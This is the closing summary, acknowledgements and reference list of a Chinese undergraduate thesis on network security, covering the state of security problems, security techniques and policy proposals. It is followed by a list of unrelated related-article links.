本次的毕业设计是大学五年以来专业学习和探索的共同结果,在设计的过程中,又再一次对自己的学习历程进行了一个回顾和总结,虽然过程并不是一路畅通,但通过不断的学习和完善,最终得到了一个较为满意的答卷。

通过本次毕业设计,我走出了专业学习的课本,第一次用所学的知识去了解了网络世界,防知纸上得来终觉浅,绝知此事要躬行。我通过大学所学习到的知识,将其扩展到了网络安全现状,网络安全技术以及网络安全策略等三大板块,着重了解分析了网络安全技术的重要性和可行性,虽然分析的技术和范围也许只是诺大网络世界的冰山一角,但其对毕业之后的学习乃至以后的工作都打下了坚实的基础。

本次毕业设计初步归纳了网络安全现状存在的问题,大多都与信息数据安全相关;其次分析了网络安全技术,其中存在部分可攻可防的安全技术,也使我第一次了解到网络安全技术的多样性,为了证实技术的可行性,我初步建立了网络安全仿真实验环境,用于测试技术是否安全有效。最后针对网络安全问题的几大现象,提出了三个不同方面不同角度的安全策略,致力于提高网络安全环境,减少网络安全危害。毕业设计内容虽较为完整,但内容还稍逊色,更高层面的剖析和解读还需要我更加丰富专业的知识以及精湛的技术,在设计的过程中同样也给了我一次查漏补缺的机会,明白了自己的不足之处,往后还需不断丰富知识,提高能力,来应对更多的网络安全问题。

随着大数据时代的极速发展和网络规模的不断扩大,网络安全问题也将会面临更多的挑战,这也代表着需要国家、企业乃至我们每个人坚持不懈地去建立和维护一个安全,高效,健康的网络环境,正是有了一个这样的网络安全环境,社会的生产生活才会不断良性发展,我相信这两者之间是相辅相成的。而投身网络安全建设也具备非常大的就业前景,相信在不久的将来,网络安全问题会有一个质的飞跃。

致 谢

在毕业设计完成之际,首先我要感谢我的论文指导老师钱老师,她多次在论文设计过程中给予我中肯的评价和肯定,同时也非常及时地给我提出了需要修改或完善的建议,为我的毕业设计推波助澜。我个人是一个相对慢性子的人,由于钱老师的及时督促,我才得以在较为宽裕的时间里完成了毕业设计工作。由于疫情和实习原因,我和部分小组同学仍延迟返校,但钱老师通过腾讯会议等方式积极与我们保持沟通与联系,关心我们的进展情况,及时给出指导建议,带领我们一起完成毕业设计,在这里衷心地感谢钱老师,也祝愿她在未来的生活和工作中一切顺意!

其次,要感谢我们的毕业设计小组成员,在许多犹豫不决,困惑难辨的时候非常积极地给予我帮助,比如文献综述如何参考,进展计划如何开展,系统上传出现问题等等,他们都很乐于帮我解决问题,也在完成毕业设计期间看到了每个人身上的能力与优点,是一次非常难忘的设计过程。

最后,我要感谢我的家人和朋友,谢谢家人支持理解我的学业,为我做美味的一日三餐,谢谢我的朋友们在毕业设计期间枯燥无味的生活里带给我快乐和宽慰,在我烦恼不安的时候开导我,让我开心愉悦地完成了此次毕业设计,我不甚感激!

通过这一阶段的学习和研究,论文设计得以顺利完成,这将成为我大学生涯结束的终点,但同时也是我生活工作的新起点,这将激励我不断前进人生的道路,再次感谢所有给予我帮助的老师,家人和朋友,谢谢大家!

参考文献

  1. 邓礼辉.网络安全6大特性解析[J].电脑知识与技术,2010,6(14):3585+3594.

  2. 张民. 基于网络安全独立元素[D].电子科技大学,2008.

  3. 裘志华. 网络安全的技术与管理[D].大连海事大学,2005.

  4. 许开宇. 校园网络安全技术和BT技术应用研究[D].吉林大学,2005.

  5. 赵培琨.浅析目前计算机网络安全现状及对策[J].科技资讯,2019,17(14):20-21.DOI:10.16661/j.cnki.1672-3791.2019.14.020.

  6. 郑袁平,贺嘉,陈珍文,尹泽华.大数据时代网络安全问题及对策研究[J].网络安全技术与应用,2020(06):83-85.

  7. 何正玲.黑客攻击与网络安全防范[J].内蒙古科技与经济,2011(11):76-77.

  8. 陈霜霜. 基于网络行为的蠕虫检测技术研究[D].扬州大学,2013.

  9. 姚明. 通信行业职业技能鉴定信息管理系统研究与设计[D].北京邮电大学,2012.

  10. 周小琳. 高校网络安全存在的问题与对策研究[D].青岛理工大学,2015.

  11. 张红波. 嵌入式系统视频会议控制技术的研究与实现[D].南京邮电大学,2014.

  12. 李卓.数据加密技术在计算机网络安全中的应用[J].软件,2021,42(05):163-165+177.

  13. 曹鼎. 无纸化考试系统的应用层通信安全机制研究与实现[D].华中科技大学,2007.

  14. 陈文惠. 防火墙系统策略配置研究[D].中国科学技术大学,2007.

  15. 李振汕.关于校园网安全管理的研究[J].计算机安全,2008(09):93-96.

[16]Bruce Schneier.Secrets and Lies:Digital Secm’ity in aNetworked World[M]John Wiley&Sons.Inc.2000.

[17]British Standard,BS Tech Cttee BSFD/12,Info.Sec.Mgmt,“BS 7799:1995 Code of Practice for Information Security Management”,February 1995,British Standards Institution, 5~20

[18]HP.2011 top cyber security risks report[EB/OL].http://wenku.it168.com/

相关文章:

  • 5分钟申请edu邮箱【方案本周有效】
  • Linux 与 Windows:哪个操作系统适合你?
  • 用 Vue 做一个轻量离线的“待办清单 + 情绪打卡”小工具
  • 计算A图片所有颜色占B图片红色区域的百分比
  • 简简单单探讨下starter
  • 手动移植UGUI
  • 网络原理1
  • Baklib内容中台AI重构智能服务
  • 日语学习-日语知识点小记-构建基础-JLPT-N4阶段(31):そう
  • graphviz, dot, Error: lost rA sA edge; 独立的模块
  • CVE-2021-34429源码分析与漏洞复现
  • CCF CSP 第37次(2025.03)(3_模板展开_C++)(哈希表+stringstream)
  • Python数据可视化科技图表绘制系列教程(一)
  • 基于Python学习《Head First设计模式》第五章 单件模式
  • Docker部署与应用、指令
  • Qwen与Llama分词器核心差异解析
  • vue3学习
  • C++和C#界面开发方式的全面对比
  • 秋招Day12 - 计算机网络 - IP
  • 相机--相机成像原理和基础概念
  • 有什么做3维的案例网站/浏览器下载安装2023版本
  • 手机网站 等比缩放/网站怎么优化搜索
  • 奶茶店做网站好处/网络营销策划与创意
  • 邯郸做wap网站的公司/搜索引擎营销的特点有
  • 博客网站建设源码/正规接单赚佣金的app
  • 做自行车网站应该注意什么/竞价网站推广